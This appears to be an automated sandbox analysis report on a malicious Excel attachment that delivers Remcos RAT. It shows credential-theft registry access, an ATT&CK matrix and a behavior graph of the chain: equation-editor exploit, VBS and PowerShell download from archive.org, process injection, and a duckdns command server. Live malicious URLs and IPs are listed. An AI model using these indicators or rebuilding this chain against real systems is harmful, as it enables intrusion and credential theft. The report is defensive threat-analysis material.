                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4addJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
                Tries to steal Mail credentials (via file registry)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: ESMTPPassword17_2_004033F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword17_2_00402DB3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword17_2_00402DB3
                Yara detected WebBrowserPassView password recovery tool
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 1764, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Detected Remcos RAT
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-R2I0JWJump to behavior
                Yara detected Remcos RAT
                Source: Yara matchFile source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 13.2.powershell.exe.41beb20.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 13.2.powershell.exe.41beb20.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000E.00000002.620697128.0000000000525000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.620697128.0000000000541000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.512511300.0000000003E99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2772, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2780, type: MEMORYSTR
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: cmd.exe14_2_0040569A

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information221
                Scripting                		Valid Accounts11
                Native API                		221
                Scripting                		1
                DLL Side-Loading                		1
                Deobfuscate/Decode Files or Information                		2
                OS Credential Dumping                		2
                System Time Discovery                		Remote Services11
                Archive Collected Data                		25
                Ingress Tool Transfer                		Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault Accounts43
                Exploitation for Client Execution                		1
                DLL Side-Loading                		1
                Bypass User Account Control                		21
                Obfuscated Files or Information                		111
                Input Capture                		1
                Account Discovery                		Remote Desktop Protocol1
                Data from Local System                		21
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts123
                Command and Scripting Interpreter                		1
                Windows Service                		1
                Access Token Manipulation                		1
                DLL Side-Loading                		2
                Credentials in Registry                		1
                System Service Discovery                		SMB/Windows Admin Shares2
                Email Collection                		1
                Remote Access Software                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal Accounts2
                Service Execution                		Login Hook1
                Windows Service                		1
                Bypass User Account Control                		3
                Credentials In Files                		4
                File and Directory Discovery                		Distributed Component Object Model111
                Input Capture                		3
                Non-Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud Accounts3
                PowerShell                		Network Logon Script422
                Process Injection                		1
                Masquerading                		LSA Secrets38
                System Information Discovery                		SSH3
                Clipboard Data                		214
                Application Layer Protocol                		Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
                Virtualization/Sandbox Evasion                		Cached Domain Credentials3
                Security Software Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                Access Token Manipulation                		DCSync21
                Virtualization/Sandbox Evasion                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job422
                Process Injection                		Proc Filesystem4
                Process Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                Application Window Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                System Owner/User Discovery                		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
                Remote System Discovery                		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1500264 Sample: RFQ No. 109078906v.xla.xlsx Startdate: 28/08/2024 Architecture: WINDOWS Score: 100 65 zhort.de 2->65 85 Multi AV Scanner detection for domain / URL 2->85 87 Suricata IDS alerts for network traffic 2->87 89 Found malware configuration 2->89 91 25 other signatures 2->91 11 EXCEL.EXE 29 25 2->11         started        signatures3 process4 dnsIp5 69 zhort.de 88.99.66.38, 443, 49161, 49163 HETZNER-ASDE Germany 11->69 71 107.172.31.21, 49162, 49169, 49170 AS-COLOCROSSINGUS United States 11->71 55 C:\Users\...\~$RFQ No. 109078906v.xla.xlsx, data 11->55 dropped 57 sweettastedbananab...esmoothheret[1].doc, Rich 11->57 dropped 15 wscript.exe 1 11->15         started        18 WINWORD.EXE 348 31 11->18         started        file6 process7 dnsIp8 113 Suspicious powershell command line found 15->113 115 Wscript starts Powershell (via cmd or directly) 15->115 117 Very long command line found 15->117 125 3 other signatures 15->125 22 powershell.exe 4 15->22         started        67 zhort.de 18->67 45 C:\Users\user\AppData\...\zhort.de.url, MS 18->45 dropped 47 C:\Users\user\AppData\Roaming\...\FoNVg0.url, MS 18->47 dropped 49 ~WRF{03652721-936B...4-9599756B16B0}.tmp, Composite 18->49 dropped 51 C:\Users\user\AppData\Local\...\FFA95D3F.doc, Rich 18->51 dropped 119 Microsoft Office launches external ms-search protocol handler (WebDAV) 18->119 121 Office viewer loads remote template 18->121 123 Microsoft Office drops suspicious files 18->123 25 EQNEDT32.EXE 12 18->25         started        file9 signatures10 process11 file12 101 Suspicious powershell command line found 22->101 103 Suspicious execution chain found 22->103 28 powershell.exe 12 5 22->28         started        53 C:\...\sweetbuttersmoothbananaherefor.vBs, Unicode 25->53 dropped 105 Office equation editor establishes network connection 25->105 107 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 25->107 signatures13 process14 dnsIp15 73 ia803104.us.archive.org 207.241.232.154, 443, 49171 INTERNET-ARCHIVEUS United States 28->73 109 Writes to foreign memory regions 28->109 111 Injects a PE file into a foreign processes 28->111 32 RegAsm.exe 3 10 28->32         started        signatures16 process17 dnsIp18 59 2024remcmon.duckdns.org 32->59 61 2024remcmon.duckdns.org 192.210.214.9, 14645, 49173, 49174 AS-COLOCROSSINGUS United States 32->61 63 geoplugin.net 178.237.33.50, 49175, 80 ATOM86-ASATOM86NL Netherlands 32->63 75 Contains functionality to bypass UAC (CMSTPLUA) 32->75 77 Detected Remcos RAT 32->77 79 Tries to steal Mail credentials (via file registry) 32->79 83 6 other signatures 32->83 36 RegAsm.exe 1 32->36         started        39 RegAsm.exe 32->39         started        41 RegAsm.exe 11 32->41         started        43 RegAsm.exe 32->43         started        signatures19 81 Uses dynamic DNS services 59->81 process20 signatures21 93 Tries to steal Instant Messenger accounts or passwords 36->93 95 Tries to steal Mail credentials (via file / registry access) 36->95 97 Searches for Windows Mail specific files 36->97 99 Tries to harvest and steal browser information (history, passwords, etc) 39->99

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                RFQ No. 109078906v.xla.xlsx11%ReversingLabs
                RFQ No. 109078906v.xla.xlsx21%VirustotalBrowse
                RFQ No. 109078906v.xla.xlsx100%Joe Sandbox ML

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\sweettastedbananabuttersmoothchcolcatebutterrichcontenttokeepsmoothbutterchocolatebuntogetmesweetgirl________yummybutterchocolatesmoothheret[1].doc100%AviraHEUR/Rtf.Malformed
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{03652721-936B-412E-9DA4-9599756B16B0}.tmp100%AviraEXP/CVE-2017-11882.Gen
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FFA95D3F.doc100%AviraHEUR/Rtf.Malformed

                Unpacked PE Files

                No Antivirus matches

                Domains

                SourceDetectionScannerLabelLink
                zhort.de2%VirustotalBrowse
                geoplugin.net1%VirustotalBrowse
                ia803104.us.archive.org1%VirustotalBrowse
                2024remcmon.duckdns.org16%VirustotalBrowse

                URLs

                SourceDetectionScannerLabelLink
                http://b.scorecardresearch.com/beacon.js0%URL Reputationsafe
                http://acdn.adnxs.com/ast/ast.js0%URL Reputationsafe
                http://www.imvu.comr0%URL Reputationsafe
                http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_0%URL Reputationsafe
                http://ocsp.entrust.net030%URL Reputationsafe
                https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=10%URL Reputationsafe
                https://contoso.com/License0%URL Reputationsafe
                https://support.google.com/chrome/?p=plugin_flash0%URL Reputationsafe
                http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.png0%URL Reputationsafe
                http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=90%URL Reputationsafe
                http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.html0%URL Reputationsafe
                https://deff.nelreports.net/api/report?cat=msn0%URL Reputationsafe
                https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js0%URL Reputationsafe
                http://go.micros0%URL Reputationsafe
                http://cache.btrll.com/default/Pix-1x1.gif0%URL Reputationsafe
                http://pr-bh.ybp.yahoo.com/sync/msft/16145220553121086830%URL Reputationsafe
                http://geoplugin.net/json.gp/C0%URL Reputationsafe
                http://o.aolcdn.com/ads/adswrappermsni.js0%URL Reputationsafe
                http://cdn.taboola.com/libtrc/msn-home-network/loader.js0%URL Reputationsafe
                https://contoso.com/0%URL Reputationsafe
                https://nuget.org/nuget.exe0%URL Reputationsafe
                http://static.chartbeat.com/js/chartbeat.js0%URL Reputationsafe
                https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg100%URL Reputationmalware
                http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%0%URL Reputationsafe
                https://login.yahoo.com/config/login0%URL Reputationsafe
                http://ocsp.entrust.net0D0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%30%URL Reputationsafe
                http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(0%URL Reputationsafe
                http://107.172.31.21/xampp/nbc/sweetbuttersmoothbananahereforyou.tIFTC:0%Avira URL Cloudsafe
                https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=90%URL Reputationsafe
                http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_sh0%URL Reputationsafe
                http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.js0%URL Reputationsafe
                http://nuget.org/NuGet.exe0%URL Reputationsafe
                https://ia803104.us.archive.org0%Avira URL Cloudsafe
                https://www.ccleaner.com/go/app_cc_pro_trialkey0%URL Reputationsafe
                http://crl.entrust.net/server1.crl00%URL Reputationsafe
                https://contextual.media.net/8/nrrV73987.js0%URL Reputationsafe
                http://www.imvu.com0%URL Reputationsafe
                https://contoso.com/Icon0%URL Reputationsafe
                https://contextual.media.net/0%URL Reputationsafe
                http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.js0%URL Reputationsafe
                https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%20%URL Reputationsafe
                https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au0%URL Reputationsafe
                http://geoplugin.net/json.gp0%URL Reputationsafe
                https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=5916504975490%URL Reputationsafe
                http://cdn.at.atwola.com/_media/uac/msn.html0%URL Reputationsafe
                http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2Fset0%URL Reputationsafe
                https://secure.comodo.com/CPS00%URL Reputationsafe
                https://policies.yahoo.com/w3c/p3p.xml0%URL Reputationsafe
                http://crl.entrust.net/2048ca.crl00%URL Reputationsafe
                http://www.ebuddy.com0%URL Reputationsafe
                http://www.nirsoft.net0%Avira URL Cloudsafe
                http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%Avira URL Cloudsafe
                https://zhort.de/FoNVg00%Avira URL Cloudsafe
                http://www.imvu.com/LK0%Avira URL Cloudsafe
                http://107.172.31.210%Avira URL Cloudsafe
                http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com0%Avira URL Cloudsafe
                http://107.172.31.210%VirustotalBrowse
                http://www.nirsoft.net0%VirustotalBrowse
                https://www.google.com0%Avira URL Cloudsafe
                https://zhort.de/FoNVg02%VirustotalBrowse
                http://www.msn.com/?ocid=iehp0%Avira URL Cloudsafe
                http://107.172.31.21/xampp/nbc/un/sweettastedbananabuttersmoothchcolcatebutterrichcontenttokeepsmoothbutterchocolatebuntogetmesweetgirl________yummybutterchocolatesmoothheret.doc0%Avira URL Cloudsafe
                https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=10330%Avira URL Cloudsafe
                http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%VirustotalBrowse
                http://www.nirsoft.net/0%Avira URL Cloudsafe
                http://www.msn.com/de-de/?ocid=iehp0%Avira URL Cloudsafe
                https://ia803104.us.archive.org1%VirustotalBrowse
                https://ia803104.us.archive.org/27/items/vbs_20240LR0%Avira URL Cloudsafe
                2024remcmon.duckdns.org100%Avira URL Cloudmalware
                https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=10330%VirustotalBrowse
                http://p.rfihub.com/cm?in=1&pub=345&userid=16145220553121086830%Avira URL Cloudsafe
                http://107.172.31.21/xampp/nbc/un/sweettastedbananabuttersmoothchcolcatebutterrichcontenttokeepsmoothbutterchocolatebuntogetmesweetgirl________yummybutterchocolatesmoothheret.doc6%VirustotalBrowse
                http://www.nirsoft.net/0%VirustotalBrowse
                https://zhort.de/FoNVg0yX0%Avira URL Cloudsafe
                http://www.msn.com/de-de/?ocid=iehp0%VirustotalBrowse
                https://ia803104.us.archive.org/27/items/vbs_20240LR1%VirustotalBrowse
                2024remcmon.duckdns.org16%VirustotalBrowse
                http://107.172.31.21/xampp/nbc/sweetbuttersmoothbananahereforyou.tIF0%Avira URL Cloudsafe
                http://107.172.31.21/xampp/nbc/EVRR.txt0%Avira URL Cloudsafe
                http://107.172.31.21/xampp/nbc/sweetbuttersmoothbananahereforyou.tIFU0%Avira URL Cloudsafe
                https://www.google.com0%VirustotalBrowse
                http://www.msn.com/0%Avira URL Cloudsafe
                http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%Avira URL Cloudsafe
                http://p.rfihub.com/cm?in=1&pub=345&userid=16145220553121086830%VirustotalBrowse
                https://www.google.com/accounts/servicelogin0%Avira URL Cloudsafe
                https://zhort.de/0%Avira URL Cloudsafe
                http://www.msn.com/advertisement.ad.js0%Avira URL Cloudsafe
                http://www.msn.com/?ocid=iehp0%VirustotalBrowse
                http://107.172.31.21/xampp/nbc/sweetbuttersmoothbananahereforyou.tIFj0%Avira URL Cloudsafe
                http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%VirustotalBrowse
                http://www.msn.com/advertisement.ad.js0%VirustotalBrowse
                http://www.msn.com/0%VirustotalBrowse
                https://www.google.com/accounts/servicelogin0%VirustotalBrowse
                https://zhort.de/0%VirustotalBrowse

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                zhort.de
                		88.99.66.38
                		truetrueunknown
                geoplugin.net
                		178.237.33.50
                		truefalseunknown
                ia803104.us.archive.org
                		207.241.232.154
                		truetrueunknown
                2024remcmon.duckdns.org
                		192.210.214.9
                		truetrueunknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                https://zhort.de/FoNVg0false
                • 2%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://107.172.31.21/xampp/nbc/un/sweettastedbananabuttersmoothchcolcatebutterrichcontenttokeepsmoothbutterchocolatebuntogetmesweetgirl________yummybutterchocolatesmoothheret.doctrue
                • 6%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpgtrue
                • URL Reputation: malware
                		unknown
                2024remcmon.duckdns.orgtrue
                • 16%, Virustotal, Browse
                • Avira URL Cloud: malware
                		unknown
                http://107.172.31.21/xampp/nbc/sweetbuttersmoothbananahereforyou.tIFtrue
                • Avira URL Cloud: safe
                		unknown
                http://107.172.31.21/xampp/nbc/EVRR.txttrue
                • Avira URL Cloud: safe
                		unknown
                http://geoplugin.net/json.gpfalse
                • URL Reputation: safe
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://b.scorecardresearch.com/beacon.jsbhv2AF7.tmp.15.drfalse
                • URL Reputation: safe
                		unknown
                http://acdn.adnxs.com/ast/ast.jsbhv2AF7.tmp.15.drfalse
                • URL Reputation: safe
                		unknown
                http://www.imvu.comrRegAsm.exe, 00000012.00000002.518600244.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_bhv2AF7.tmp.15.drfalse
                • URL Reputation: safe
                		unknown
                http://107.172.31.21/xampp/nbc/sweetbuttersmoothbananahereforyou.tIFTC:EQNEDT32.EXE, 00000009.00000003.492215861.000000000037F000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://ia803104.us.archive.orgpowershell.exe, 0000000D.00000002.511591510.0000000002399000.00000004.00000800.00020000.00000000.sdmptrue
                • 1%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://ocsp.entrust.net03powershell.exe, 0000000D.00000002.514548076.00000000050C2000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1bhv2AF7.tmp.15.drfalse
                • URL Reputation: safe
                		unknown
                https://contoso.com/Licensepowershell.exe, 0000000D.00000002.512511300.0000000003289000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://support.google.com/chrome/?p=plugin_flashRegAsm.exe, 0000000F.00000002.522516063.0000000002C80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.522490434.0000000002A8E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.522503026.0000000002B30000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.pngbhv2AF7.tmp.15.drfalse
                • URL Reputation: safe
                		unknown
                http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0powershell.exe, 0000000D.00000002.514548076.00000000050C2000.00000004.00000020.00020000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://www.diginotar.nl/cps/pkioverheid0powershell.exe, 0000000D.00000002.514548076.00000000050C2000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9bhv2AF7.tmp.15.drfalse
                • URL Reputation: safe
                		unknown
                http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.htmlbhv2AF7.tmp.15.drfalse
                • URL Reputation: safe
                		unknown
                http://www.nirsoft.netRegAsm.exe, 0000000F.00000002.521695827.0000000000204000.00000004.00000010.00020000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://deff.nelreports.net/api/report?cat=msnbhv2AF7.tmp.15.drfalse
                • URL Reputation: safe
                		unknown
                https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.jsbhv2AF7.tmp.15.drfalse
                • URL Reputation: safe
                		unknown
                http://www.imvu.com/LKRegAsm.exe, 00000012.00000002.518576089.000000000037C000.00000004.00000010.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://go.microspowershell.exe, 0000000D.00000002.511591510.0000000002B6C000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://107.172.31.21powershell.exe, 0000000D.00000002.511591510.00000000024B9000.00000004.00000800.00020000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comRegAsm.exe, 00000012.00000002.518600244.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://cache.btrll.com/default/Pix-1x1.gifbhv2AF7.tmp.15.drfalse
                • URL Reputation: safe
                		unknown
                http://pr-bh.ybp.yahoo.com/sync/msft/1614522055312108683bhv2AF7.tmp.15.drfalse
                • URL Reputation: safe
                		unknown
                https://www.google.comRegAsm.exe, RegAsm.exe, 00000012.00000002.518600244.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://geoplugin.net/json.gp/Cpowershell.exe, 0000000D.00000002.512511300.0000000003E99000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://o.aolcdn.com/ads/adswrappermsni.jsbhv2AF7.tmp.15.drfalse
                • URL Reputation: safe
                		unknown
                http://cdn.taboola.com/libtrc/msn-home-network/loader.jsbhv2AF7.tmp.15.drfalse
                • URL Reputation: safe
                		unknown
                http://www.msn.com/?ocid=iehpbhv2AF7.tmp.15.drfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://contoso.com/powershell.exe, 0000000D.00000002.512511300.0000000003289000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://nuget.org/nuget.exepowershell.exe, 0000000D.00000002.512511300.0000000003289000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033bhv2AF7.tmp.15.drfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://static.chartbeat.com/js/chartbeat.jsbhv2AF7.tmp.15.drfalse
                • URL Reputation: safe
                		unknown
                http://www.msn.com/de-de/?ocid=iehpbhv2AF7.tmp.15.drfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%bhv2AF7.tmp.15.drfalse
                • URL Reputation: safe
                		unknown
                https://login.yahoo.com/config/loginRegAsm.exefalse
                • URL Reputation: safe
                		unknown
                http://www.nirsoft.net/RegAsm.exe, 00000012.00000002.518600244.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://ocsp.entrust.net0Dpowershell.exe, 0000000D.00000002.514548076.00000000050C2000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000B.00000002.516053834.0000000002431000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.511591510.0000000002261000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
